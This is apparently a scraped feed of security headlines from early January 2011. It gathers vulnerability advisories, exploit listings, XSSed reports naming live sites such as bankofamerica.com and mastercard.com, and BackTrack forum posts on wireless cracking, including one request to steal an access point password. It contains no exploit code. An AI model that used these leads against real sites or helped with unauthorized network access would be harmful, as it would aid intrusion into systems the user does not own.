  Geeklog is a PHP/MySQL based application for managing dynamic web content.
  "Out of the box", it is a blog engine, or a CMS with support for
  comments,...
  

  Tags:   

• 10:14

  WikLink 0.1.3 SQL Injection

   » ‎ Packet Storm Security Exploits
  WikLink version 0.1.3 suffers from a remote SQL injection vulnerability.

  Tags:  injection sql wiklink vulnerability  

• 10:14

  WikLink 0.1.3 SQL Injection

   » ‎ Packet Storm Security Recent Files
  WikLink version 0.1.3 suffers from a remote SQL injection vulnerability.

  Tags:  injection sql wiklink vulnerability  

• 10:14

  WikLink 0.1.3 SQL Injection

   » ‎ Packet Storm Security Misc. Files
  WikLink version 0.1.3 suffers from a remote SQL injection vulnerability.

  Tags:  injection sql wiklink vulnerability  

• 10:13

  BT4 R1 and R2 not getting installed in amd athlon X2 B24

   » ‎ BackTrack Linux Forums
  Hi everyone...
  I am trying to install BT4 in HP Compaq 6005 pro microtower but the installation gets stuck and i get a response as (initramfs) with some basic linux commands.
  Hardware - Processor - AMD Athlon X2 B24, RAM 2 GB
  The same dvd is working on intel c2d E7500 processor.
  Is there a compatibility issue with AMD???
  
  Please help...
  Thanks in advance... need it urgently

  Tags:   

• 10:07

  RC pontoon from a toy car

   » ‎ Hack a Day
  [Kevin Sandom] built this boat using a radio controlled toy car. The two pontoons are recycled from Styrofoam packaging material using some thick wire to connect them and provide a framework for the propulsion and control circuitry. The motor itself is a hobby outboard, which really only required [Kevin] to develop a method for steering. [...]

  Tags:  pontoon toy car kevin kevin-sandom styrofoam-packaging control-circuitry thick-wire hacks  

• 10:04

  How to add a startup script to BT4? how to edit rc.local?

   » ‎ BackTrack Linux Forums
  i would like to run the command:
  
  915resolution 5a 1024 600 24
  
  automatically before startx everytime I start up, I hear the way to do this is to edit the rc.local file but how would i do to this, im not familiar with the way the file is laid out, indentions and scripts.
  
  could someone give me an example of the rc.local file with this script added?
  
  the file 915resolution is in
  
  /sbin/915resolution
  
  thanks

  Tags:   

• 9:52

  Owned an Exposed

   » ‎ BackTrack Linux Forums
  so, since it happened, do we need to worry about existing backtrack installations? are the ISO's safe? ettercap was mentioned... isn't that included with backtrack? or is all that sure to be safe?

  Tags:   

• 9:50

  www.eVuln.com : SQL Injection in WikLink

   » ‎ Bugtraq

  Posted by bt on Jan 03

  www.eVuln.com advisory:
  SQL Injection in WikLink
  Summary: http://evuln.com/vulns/170/summary.html
  Details: http://evuln.com/vulns/170/description.html
  
  -----------Summary-----------
  eVuln ID: EV0170
  Software: WikLink
  Vendor: n/a
  Version: 0.1.3
  Critical Level: medium
  Type: SQL Injection
  Status: Unpatched. No reply from developer(s)
  PoC: Available
  Solution: Not available
  Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )...
  

  Tags:   

• 9:22

  Witchxtool Port / LFI / SQL Scanner And MD5 Bruteforcing Tool 1.0

   » ‎ Packet Storm Security Recent Files
  Witchxtool is a perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner.

  Tags:  witchxtool scanner lfi proxy-scanner port-scanner bruteforcer  

• 9:22

  Witchxtool Port / LFI / SQL Scanner And MD5 Bruteforcing Tool 1.0

   » ‎ Packet Storm Security Tools
  Witchxtool is a perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner.

  Tags:  witchxtool scanner lfi proxy-scanner port-scanner bruteforcer  

• 9:22

  Witchxtool Port / LFI / SQL Scanner And MD5 Bruteforcing Tool 1.0

   » ‎ Packet Storm Security Misc. Files
  Witchxtool is a perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner.

  Tags:  witchxtool scanner lfi proxy-scanner port-scanner bruteforcer  

• 9:22

  YourTube 1.0 Cross Site Request Forgery

   » ‎ Packet Storm Security Exploits
  YourTube version 1.0 suffers from a cross site request forgery vulnerability.

  Tags:  cross yourtube site forgery vulnerability  

• 9:22

  YourTube 1.0 Cross Site Request Forgery

   » ‎ Packet Storm Security Recent Files
  YourTube version 1.0 suffers from a cross site request forgery vulnerability.

  Tags:  cross yourtube site forgery vulnerability  

• 9:22

  YourTube 1.0 Cross Site Request Forgery

   » ‎ Packet Storm Security Misc. Files
  YourTube version 1.0 suffers from a cross site request forgery vulnerability.

  Tags:  cross yourtube site forgery vulnerability  

• 8:50

  Geeklog 1.7.1

   » ‎ Full Disclosure

  Posted by YGN Ethical Hacker Group on Jan 03

  ==========================================
  Geeklog 1.7.1 <= Cross Site Scripting Vulnerability
  ==========================================
  
  1. OVERVIEW
  
  The Geeklog was vulnerable to Cross Site Scripting in its administration
  backend.
  
  2. BACKGROUND
  
  Geeklog is a PHP/MySQL based application for managing dynamic web content.
  "Out of the box", it is a blog engine, or a CMS with support for comments,
  trackbacks,
  multiple syndication...
  

  Tags:   

• 7:22

  Sahana Agasti 0.6.4 SQL Injection

   » ‎ Packet Storm Security Exploits
  Sahana Agasti versions 0.6.4 and below suffer from a remote SQL injection vulnerability.

  Tags:  agasti sql sahana vulnerability  

• 7:22

  Sahana Agasti 0.6.4 SQL Injection

   » ‎ Packet Storm Security Recent Files
  Sahana Agasti versions 0.6.4 and below suffer from a remote SQL injection vulnerability.

  Tags:  agasti sql sahana vulnerability  

• 7:22

  Sahana Agasti 0.6.4 SQL Injection

   » ‎ Packet Storm Security Misc. Files
  Sahana Agasti versions 0.6.4 and below suffer from a remote SQL injection vulnerability.

  Tags:  agasti sql sahana vulnerability  

• 7:00

  Flower with PCB pot and LED blossoms

   » ‎ Hack a Day
  [Johannes Agricola] recently held a workshop at the Peace Mission in Goettingen, Germany where he shared his RGB LED flowers. The small round PCB hosts an ATmega88 microcontroller which is running the V-USB stack so that the unit can be controlled by a computer. Each flower blossom is an RGB LED connected with four enameled wires [...]

  Tags:  pcb led rgb johannes-agricola flower germany enameled-wires goettingen-germany microcontroller hacks  

• 6:50

  Como insertar un diccionario al bt4

   » ‎ BackTrack Linux Forums
  Hola amigos, les planteo una duda.
  Me baje unos diccionarios para wpa y no se como agregarlos al bt4 xq lo uso como live cd y no me reconoce el pendrive en el q los tengo cargado... alguien me puede ayudar?? muchas gracias!!

  Tags:   

• 6:37

  Announcing cross_fuzz, a potential 0-day in circulation, and more

   » ‎ Bugtraq

  Posted by Michal Zalewski on Jan 03

  Hi list,
  
  == SUMMARY ==
  
  I am happy to announce the availability of cross_fuzz - an amazingly
  effective but notoriously annoying cross-document DOM binding fuzzer that
  helped identify about one hundred bugs in all browsers on the market - many
  of said bugs exploitable - and is still finding more.
  
  The fuzzer owes some of its efficiency to dynamically generating extremely
  long-winding sequences of DOM operations across multiple documents,...
  

  Tags:   

• 6:19

  Alfa AWUS036H (rtl 8187) + VMPlayer = endless trouble?

   » ‎ BackTrack Linux Forums
  Hey there,
  
  to cut long things short:
  I'm having bad trouble to get my Alfa AWUS036H (USB-wlan-interface with rtl 8187) to work with the aircrack-ng when Backtrack 4 R2 is hosted as a virtual machine in VM-Player. That's sad since I bought the Alfa-interface about two years or something ago especially to use it with Backtrack 3 (and it did a wonderful job).
  
  But now, on Backtrack 4 R2, I'm feeling like I'm having to hack my own wireless device instead of keeping on learning to compromise the designated pentesting-devices.
  
  After some hours of research I figured that on the start of every VM-Player session I have to use
  
  Code: rmmod rtl8187
#unplug the Alfa in the VM-Player
modprobe rtl8187
#plug the Alfa in via VM-Player and wait like 5 secs
ifconfig wlan0 up to get Wicd to find some connections and use Firefox, Metasploit, and so on.
  
  But when I try to run
  
  airmon-ng start wlan0 (for example), I get
  
  Quote: Found 2 processes that could cause trouble... After some long and annoying sessions of trial and error I made it with
  
  rmmod rtl8187
  #unplug via VM-Player*
  modprobe rtl8187
  #plug in via VM-Player and wait about 5 secs
  ifconfig wlan0 up
  ifconfig wlan0 down #yep, I had to put it up and then down
  iwconfig wlan0 mode monitor
  ifconfig wlan0 up
  
  followed by airmon-ng start wlan0 and so on and it worked including working injection and recieving my handshake. But it only worked once and seems like I have just been lucky. Since then I allways get
  
  Quote: SIOCSIFFLAGS: Unknown error 132 on "ifconfig wlan0 up" or
  
  Quote: Error for wireless request "Set Mode" (8B06) :
  SET failed on device wlan0 ; Device or resource busy. The fact, that it workes sometimes and sometimes doesn't is really kind of driving me crazy, esp. since I copied any command in the shell that made it work - it never worked twice (regardless of reconnection, reboot, and stuff).
  
  Does anybody know a solution for this problem (since I've seen that many Alfa-users got those difficulties)? Or do I finally have to buy another usb-wlan-device?
  
  Thanks in advance and best wishes,
  
  Carnivore
  
  PS: While I'm writing this I didn't get a working wlan-connection even after trying this
  
  Code: rmmod rtl8187
#unplug the Alfa in the VM-Player
modprobe rtl8187
#plug the Alfa in via VM-Player and wait like 5 secs
ifconfig wlan0 up thing for about 15 times, while it worked after 1 - 5 tries until now :(

  Tags:   

• 6:11

  Wireshark ENTTEC DMX Data RLE Buffer Overflow

   » ‎ Packet Storm Security Exploits
  Proof of concept exploit code for the Wireshark ENTTEC DMX Data RLE buffer overflow vulnerability.

  Tags:  wireshark enttec dmx buffer-overflow-vulnerability proof-of-concept  

• 6:11

  Wireshark ENTTEC DMX Data RLE Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  Proof of concept exploit code for the Wireshark ENTTEC DMX Data RLE buffer overflow vulnerability.

  Tags:  wireshark enttec dmx buffer-overflow-vulnerability proof-of-concept  

• 6:11

  Wireshark ENTTEC DMX Data RLE Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  Proof of concept exploit code for the Wireshark ENTTEC DMX Data RLE buffer overflow vulnerability.

  Tags:  wireshark enttec dmx buffer-overflow-vulnerability proof-of-concept  

• 5:22

  www.slideshare.net XSS

   » ‎ XSSed
  Moonzorg has discovered a vulnerability in www.slideshare.net, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:21

  west.stanford.edu XSS

   » ‎ XSSed
  p0pc0rn has discovered a vulnerability in west.stanford.edu, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:21

  leibniz.stanford.edu XSS

   » ‎ XSSed
  p0pc0rn has discovered a vulnerability in leibniz.stanford.edu, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:20

  search.indiatimes.com XSS

   » ‎ XSSed
  Sony has discovered a vulnerability in search.indiatimes.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:20

  roma.corriere.it XSS

   » ‎ XSSed
  Langy has discovered a vulnerability in roma.corriere.it, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:19

  milano.corriere.it XSS

   » ‎ XSSed
  Langy has discovered a vulnerability in milano.corriere.it, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:19

  view.atdmt.com Redirect

   » ‎ XSSed
  Sony has discovered a vulnerability in view.atdmt.com, which could be exploited by malicious people to conduct Redirect attacks.

  Tags:   

• 5:18

  help.comodo.com XSS

   » ‎ XSSed
  Sony has discovered a vulnerability in help.comodo.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:18

  speakout.barackobama.com XSS

   » ‎ XSSed
  Securitylab.ir has discovered a vulnerability in speakout.barackobama.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:17

  blogs.comodo.com XSS

   » ‎ XSSed
  Sony has discovered a vulnerability in blogs.comodo.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:16

  www.bankofamerica.com XSS

   » ‎ XSSed
  db has discovered a vulnerability in www.bankofamerica.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:15

  www.rba.gov.au XSS

   » ‎ XSSed
  db has discovered a vulnerability in www.rba.gov.au, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:15

  blogs.oreilly.com XSS

   » ‎ XSSed
  db has discovered a vulnerability in blogs.oreilly.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:14

  so.tv.sohu.com XSS

   » ‎ XSSed
  Securitylab.ir has discovered a vulnerability in so.tv.sohu.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:14

  tinyurl.com XSS

   » ‎ XSSed
  orange has discovered a vulnerability in tinyurl.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:13

  quicktrip.olympicair.com XSS

   » ‎ XSSed
  trv has discovered a vulnerability in quicktrip.olympicair.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:12

  www.eset.co.uk XSS

   » ‎ XSSed
  Rogunix has discovered a vulnerability in www.eset.co.uk, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:11

  local.westernunion.com XSS

   » ‎ XSSed
  Sony has discovered a vulnerability in local.westernunion.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:11

  world.mastercard.com XSS

   » ‎ XSSed
  Sony has discovered a vulnerability in world.mastercard.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 5:10

  www0.uk.shopping.com XSS

   » ‎ XSSed
  Sony has discovered a vulnerability in www0.uk.shopping.com, which could be exploited by malicious people to conduct XSS attacks.

  Tags:   

• 4:28

  Virtual Windows in Backtrack

   » ‎ BackTrack Linux Forums
  Hi,
  
  First of all, I feel kinda stupid for having to ask this, but I've searched the internet and these forums on this topic and I couldn't really find anything. So maybe I simply used the wrong keywords and Google just did its job. If that's the case, sorry for bothering you.
  
  The Problem: I want to install Windows XP virtually on my Backtrack.
  I want to train exploiting and creating exploits, and I only have one box which I'm dual booting. I don't want to install Backtrack virtually, as that has its major drawbacks like processing speed and allocated memory and stuff, which I really don't want to concern myself with.
  
  Now, maybe the solution is a simple one and I still haven't been able to find it. Installing VirtualBox just doesn't work, I have failed at several attempts. I get as far as this:
  Code: Error! Could not locate vboxdrv.ko for module vboxdrv in the DKMS tree.
You must run a dkms build for kernel 2.6.30.9 (i686) first.
Done.
Stopping VirtualBox kernel module: vboxdrv.
Starting VirtualBox kernel module: vboxdrv
* No suitable module for running kernel found. Thanks in advance for your help on this topic.
  
  Kind regards,
  tschoppi

  Tags:   

• 3:11

  Network Security Policy Compiler 3.2

   » ‎ Packet Storm Security Recent Files
  Network Security Policy Compiler (NetSPoC) is a tool for security management of large networks with different security domains. It generates configuration files for packet filters controlling the borders of security domains. It provides its own language for describing security policy and the topology of a network. The security policy is a set of rules that state which packets are allowed to pass the network and which are not. NetSPoC is topology aware - a rule for traffic from A to B is automatically applied to all managed packet filters on the path from A to B.

  Tags:  policy network security network-security-policy security-domains packet-filters  

• 3:11

  Network Security Policy Compiler 3.2

   » ‎ Packet Storm Security Misc. Files
  Network Security Policy Compiler (NetSPoC) is a tool for security management of large networks with different security domains. It generates configuration files for packet filters controlling the borders of security domains. It provides its own language for describing security policy and the topology of a network. The security policy is a set of rules that state which packets are allowed to pass the network and which are not. NetSPoC is topology aware - a rule for traffic from A to B is automatically applied to all managed packet filters on the path from A to B.

  Tags:  policy network security network-security-policy security-domains packet-filters  

• 2:32

  [dos] - Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability

   » ‎ Exploit-DB
  [dos] - Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability

  Tags:   

• 2:30

  emachines 250 notebook + BT4 - works just great

   » ‎ BackTrack Linux Forums
  emachines 250 Notebook
  Intel Atom CPU N270 @ 1.60GHz
  1Gb DIMM Synchronous 533 MHz
  
  Persistent USB drive boot working
  
  Alfa AWUS036H working
  
  Monitor mode and injection working
  
  Thanks a lot BT!

  Tags:   

• 2:28

  [webapps] - Sahana Agasti

   » ‎ Exploit-DB
  [webapps] - Sahana Agasti

  Tags:   

• 2:01

  GALLARIFIC PHP Photo Gallery Script SQL Injection

   » ‎ Packet Storm Security Exploits
  GALLARIFIC PHP Photo Gallery script suffers from a remote SQL injection vulnerability.

  Tags:  photo gallarific php script-sql gallery-script vulnerability  

• 2:01

  GALLARIFIC PHP Photo Gallery Script SQL Injection

   » ‎ Packet Storm Security Recent Files
  GALLARIFIC PHP Photo Gallery script suffers from a remote SQL injection vulnerability.

  Tags:  photo gallarific php script-sql gallery-script vulnerability  

• 2:01

  GALLARIFIC PHP Photo Gallery Script SQL Injection

   » ‎ Packet Storm Security Misc. Files
  GALLARIFIC PHP Photo Gallery script suffers from a remote SQL injection vulnerability.

  Tags:  photo gallarific php script-sql gallery-script vulnerability  

• 0:00

  Vuln: CoolPlayer M3U File Buffer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  CoolPlayer M3U File Buffer Overflow Vulnerability

  Tags:  buffer coolplayer overflow u-file buffer-overflow-vulnerability  

• 0:00

  Vuln: Microsoft Windows Kernel 'Win32k.sys' Window Class Local Privilege Escalation Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Microsoft Windows Kernel 'Win32k.sys' Window Class Local Privilege Escalation Vulnerability

  Tags:  kernel microsoft windows windows-kernel privilege-escalation-vulnerability local-privilege-escalation  

• 0:00

  Vuln: Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability

  Tags:  internet microsoft explorer code-execution internet-explorer vulnerability  

• 0:00

  Vuln: ChurchInfo 'ListEvents.php' SQL Injection Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  ChurchInfo 'ListEvents.php' SQL Injection Vulnerability

  Tags:  churchinfo php listevents vulnerability  

• 0:00

  Vuln: Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability

  Tags:  wireshark enttec dmx buffer-overflow-vulnerability  

• 0:00

  Vuln: Linux Kernel 'drivers/scsi/bfa/bfa_core.c' Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel 'drivers/scsi/bfa/bfa_core.c' Denial of Service Vulnerability

  Tags:  bfa kernel linux linux-kernel-drivers service-vulnerability denial-of-service  

• 0:00

  Vuln: Linux Kernel 'l2tp_ip_sendmsg()' and 'pppol2tp_sendmsg()' Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel 'l2tp_ip_sendmsg()' and 'pppol2tp_sendmsg()' Denial of Service Vulnerability

  Tags:  sendmsg kernel linux service-vulnerability linux-kernel denial-of-service  

• 0:00

  Vuln: Linux Kernel Local Address Limit Override Security Weakness

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel Local Address Limit Override Security Weakness

  Tags:  kernel local linux linux-kernel security-weakness override  

• 0:00

  Vuln: Linux Kernel KVM Intel VT-x Extension NULL Pointer Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel KVM Intel VT-x Extension NULL Pointer Denial of Service Vulnerability

  Tags:  kvm kernel linux service-vulnerability null-pointer linux-kernel  

• 0:00

  Vuln: Linux Kernel 'perf_event_mmap()' Local Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel 'perf_event_mmap()' Local Denial of Service Vulnerability

  Tags:  kernel perf linux service-vulnerability linux-kernel denial-of-service  

• 0:00

  Vuln: Linux Kernel 'sctp_outq_flush()' Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Linux Kernel 'sctp_outq_flush()' Denial of Service Vulnerability

  Tags:  sctp kernel linux service-vulnerability linux-kernel denial-of-service  

• 0:00

  Vuln: OpenSC Smart Card Serial Number Multiple Buffer Overflow Vulnerabilities

   » ‎ SecurityFocus Vulnerabilities
  OpenSC Smart Card Serial Number Multiple Buffer Overflow Vulnerabilities

  Tags:  card smart opensc multiple-buffer-overflow buffer-overflow-vulnerabilities smart-card  

• 0:00

  Vuln: Drupal Views Module Multiple Cross Site Scripting Vulnerabilities

   » ‎ SecurityFocus Vulnerabilities
  Drupal Views Module Multiple Cross Site Scripting Vulnerabilities

  Tags:  module multiple drupal  

• 0:00

  Vuln: Git gitweb 'index.php' Multiple Cross Site Scripting Vulnerabilities

   » ‎ SecurityFocus Vulnerabilities
  Git gitweb 'index.php' Multiple Cross Site Scripting Vulnerabilities

  Tags:  git index gitweb  

• 0:00

  Vuln: Mathematica '/tmp/MathLink' Symlink Attack Local Privilege Escalation Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Mathematica '/tmp/MathLink' Symlink Attack Local Privilege Escalation Vulnerability

  Tags:  mathematica mathlink tmp privilege-escalation-vulnerability local-privilege-escalation  

• January 02, 2011
• 22:33

  airmon-ng not working

   » ‎ BackTrack Linux Forums
  Hi :)
  I am new to BackTrack!
  I downloaded backtrack for vmware and it is running successfully. I am able to run internet on it using the 'start-network' command.
  
  But when I type 'airmon-ng', it doesn't result in the expected outcome.
  Here is the result:
  ______________________________
  Interface Chipset Driver
  ______________________________
  nothing else.. what to do??
  :confused::confused:
  
  Should I refer to any text(to learn about linux) before starting with cracking WiFi, as taught by a friend? If yes, please refer.

  Tags:   

• 22:27

  Any tools's list out there?

   » ‎ BackTrack Linux Forums
  Since i don't know where should i post this question...
  Where can i find a complete list of tools installed on bt4 r2? :confused:
  
  Sorry for my english!

  Tags:   

• 22:18

  [dos] - Music Animation Machine MIDI Player Local Crash PoC

   » ‎ Exploit-DB
  [dos] - Music Animation Machine MIDI Player Local Crash PoC

  Tags:   

• 21:39

  Secunia Security Advisory 42767

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been discovered in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

  Tags:  advisory secunia security denial-of-service security-advisory  

• 21:06

  Secunia Security Advisory 42776

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been discovered in RocketLife, which can be exploited by malicious people to compromise a user's system.

  Tags:  advisory secunia security s-system security-advisory  

• 20:46

  dual booting backtrack installation

   » ‎ BackTrack Linux Forums
  i wish to install backtrack to my system but i already have windows 7 installed on one partition and ubuntu installed on one.(Note: ubuntu was installed inside windows using the Wubi installer). so can i now install backtrack...my doubt is that would it have any effect on the ubuntu already installed...

  Tags:   

• 20:46

  Secunia Security Advisory 42770

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been discovered in HP Photo Creations, which can be exploited by malicious people to compromise a user's system.

  Tags:  advisory secunia security photo-creations hp-photo s-system  

• 20:32

  14 CMS 3.0.1 Blind SQL Injection

   » ‎ Packet Storm Security Exploits
  14 CMS version 3.0.1 suffers from a remote blind SQL injection vulnerability.

  Tags:  injection sql cms sql-injection vulnerability  

• 20:32

  14 CMS 3.0.1 Blind SQL Injection

   » ‎ Packet Storm Security Recent Files
  14 CMS version 3.0.1 suffers from a remote blind SQL injection vulnerability.

  Tags:  injection sql cms sql-injection vulnerability  

• 20:32

  14 CMS 3.0.1 Blind SQL Injection

   » ‎ Packet Storm Security Misc. Files
  14 CMS version 3.0.1 suffers from a remote blind SQL injection vulnerability.

  Tags:  injection sql cms sql-injection vulnerability  

• 20:26

  Secunia Security Advisory 42795

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been discovered in Sahana Disaster Management System, which can be exploited by malicious people to conduct SQL injection attacks.

  Tags:  advisory secunia security disaster-management-system security-advisory  

• 20:26

  Secunia Security Advisory 42773

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been reported in VLC Media Player, which can be exploited by malicious people to potentially compromise a user's system.

  Tags:  advisory secunia security s-system security-advisory  

• 20:26

  Secunia Security Advisory 42725

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Debian has issued an update for phpmyadmin. This fixes a vulnerability and two weaknesses, which can be exploited by malicious people to conduct spoofing and cross-site scripting attack and disclose system information.

  Tags:  advisory secunia security security-advisory system-information  

• 20:26

  Secunia Security Advisory 42771

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Some vulnerabilities have been discovered in Gimp, which can be exploited by malicious people to compromise a user's system.

  Tags:  advisory secunia security s-system security-advisory  

• 20:26

  Secunia Security Advisory 42797

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Multiple vulnerabilities have been discovered in ChurchInfo, which can be exploited by malicious users to conduct SQL injection attacks and malicious people to conduct cross-site request forgery attacks.

  Tags:  advisory secunia security malicious-users security-advisory  

• 20:26

  Secunia Security Advisory 42772

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - Fedora has issued an update for mantis. This fixes some vulnerabilities, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks and disclose sensitive information.

  Tags:  advisory secunia security fedora malicious-users security-advisory  

• 20:26

  Secunia Security Advisory 42792

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - A vulnerability has been discovered in Gallarific, which can be exploited by malicious people to conduct SQL injection attacks.

  Tags:  advisory secunia security security-advisory vulnerability  

• 20:26

  Secunia Security Advisory 42801

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - SUSE has issued an update for the kernel. This fixes some weaknesses and vulnerabilities, which can be exploited by malicious, local users to disclose system and potentially sensitive information, cause a DoS (Denial of Service), and gain escalated privileges, and by malicious people to cause a DoS.

  Tags:  advisory secunia security suse denial-of-service security-advisory  

• 20:26

  Secunia Security Advisory 42778

   » ‎ Packet Storm Security Advisories
  Secunia Security Advisory - SUSE has issued an update for the kernel. This fixes some weaknesses and vulnerabilities, which can be exploited by malicious, local users to disclose system and potentially sensitive information, cause a DoS (Denial of Service), and gain escalated privileges, and by malicious people to cause a DoS.

  Tags:  advisory secunia security suse denial-of-service security-advisory  

• 20:02

  Sahana Agasti 0.6.4 Remote File Inclusion

   » ‎ Packet Storm Security Exploits
  Sahana Agasti versions 0.6.4 and below suffers from multiple remote file inclusion vulnerabilities.

  Tags:  file agasti sahana inclusion  

• 20:02

  Sahana Agasti 0.6.4 Remote File Inclusion

   » ‎ Packet Storm Security Recent Files
  Sahana Agasti versions 0.6.4 and below suffers from multiple remote file inclusion vulnerabilities.

  Tags:  file agasti sahana inclusion  

• 20:02

  Sahana Agasti 0.6.4 Remote File Inclusion

   » ‎ Packet Storm Security Misc. Files
  Sahana Agasti versions 0.6.4 and below suffers from multiple remote file inclusion vulnerabilities.

  Tags:  file agasti sahana inclusion  

• 19:32

  Word list maniputlator

   » ‎ BackTrack Linux Forums
  So what we have here is a bash script that make it a lot easier to manage and adapt your word lists and dictionaries.
  
  There are 6 options:
  
  - Combine 2 word lists into one other file; file 1 + file 2 = file 3
  - Chop a word list; this allows you to cut a word list into up to 10 parts, you just need to input the number of lines that each file should have. So if you have a 1000 line file you can split it up into 10 lines of 100
  - Search through a word list; This allows you to pull up every word with a string you define in
  - Optimise a word list for WPA cracking; This removes any duplicate words, and anything <8 characters and >14 characters
  - Find a word lists word count; Kinda self explanatory
  - Estimate the time it will take for pyrit to run through a word list; This will give you the length of time it will take your computer to test a handshake with your word list if you use pyrit. If you do not use pyrit then this output will be similar to the amount of time it will take with aircrack-ng or coWPAtty doing a standard dictionary attack
  
  Here is a screen shot of the menu:
  
  
  The top panel displays the files in your current directory. The idea is that you put the script in the folder with your word lists.
  
  Usage:
  - Paste script into a folder with your word lists in
  - In terminal "cd /path/to/my/wordlists/"
  - Then run the script with "./Wordlister"
  
  And you can download it here:
  
  http://www.mediafire.com/?trrx3xj18rbt64o
  
  ~Middle

  Tags:   

• 19:11

  How To crack unsecured wireless network

   » ‎ BackTrack Linux Forums
  Hi
  i m scaning the wireless network with airodump-ng and i am find two network but iam dont know how to hacked unsecured wireless network -open Encrypt (without wep/wap encrypt) .
  i am try with airecrack-ng and other decoder tools but fail and fail it again please help me to steal access point password

  Tags:   

• 18:43

  Shout out to the Moderators and Admins!

   » ‎ BackTrack Linux Forums
  Ya, I'm new here, but I want to give a shout to all the moderators and admins that have to put up with the countless "n00bs", like myself, and all our ridiculous and "off-topic" posts.
  
  Thanks for putting up with us....or at least some of us! ;)

  Tags:   

• 18:29

  bt4-r2.iso is NOT FOUND

   » ‎ BackTrack Linux Forums
  Hey, I'm trying to download the bt4-r2.iso, but it is "NOT FOUND" ...404 error.
  
  What's up? Where can I download it?
  
  Thanks!

  Tags:   

• 17:01

  Music Animation Machine MIDI Player Proof Of Concept

   » ‎ Packet Storm Security Exploits
  Music Animation Machine MIDI player local crash proof of concept denial of service exploit.

  Tags:  music animation machine music-animation-machine crash-proof midi-player  

• 17:01

  Music Animation Machine MIDI Player Proof Of Concept

   » ‎ Packet Storm Security Recent Files
  Music Animation Machine MIDI player local crash proof of concept denial of service exploit.

  Tags:  music animation machine music-animation-machine crash-proof midi-player  

• 17:01

  Music Animation Machine MIDI Player Proof Of Concept

   » ‎ Packet Storm Security Misc. Files
  Music Animation Machine MIDI player local crash proof of concept denial of service exploit.

  Tags:  music animation machine music-animation-machine crash-proof midi-player  

• 15:36

  Strange beings with BT4 + Ubuntu + SSH

   » ‎ BackTrack Linux Forums
  So the other day i learnt how to SSH into my Laptop with BT4 on from my Ubuntu box and vice versa, then i updated BT4 to BT4 R2 and now i am unable to see either machine on the network.
  
  If i nmap scan from my PC i see everything but my laptop
  
  and if i nmap scan from my Laptop i see everything but my PC
  
  
  route -n(PC):
  Kernel IP routing table
  Destination Gateway Genmask Flags Metric Ref Use Iface
  192.168.1.0 0.0.0.0 255.255.255.0 U 2 0 0 wlan0
  169.254.0.0 0.0.0.0 255.255.0.0 U 1000 0 0 wlan0
  0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 wlan0
  
  May that be the issue, i have no idea what 169.254.0.0 is, other places have said that it wouldn't affect it...
  
  Another minor issue is that Firefox will not start in BT4 R2, all i did was apt-get upgrade, and now nothing works!
  
  Although i do know that it is connected to the network and the Internet as i can ping google and nmap the network....
  
  Any ideas?

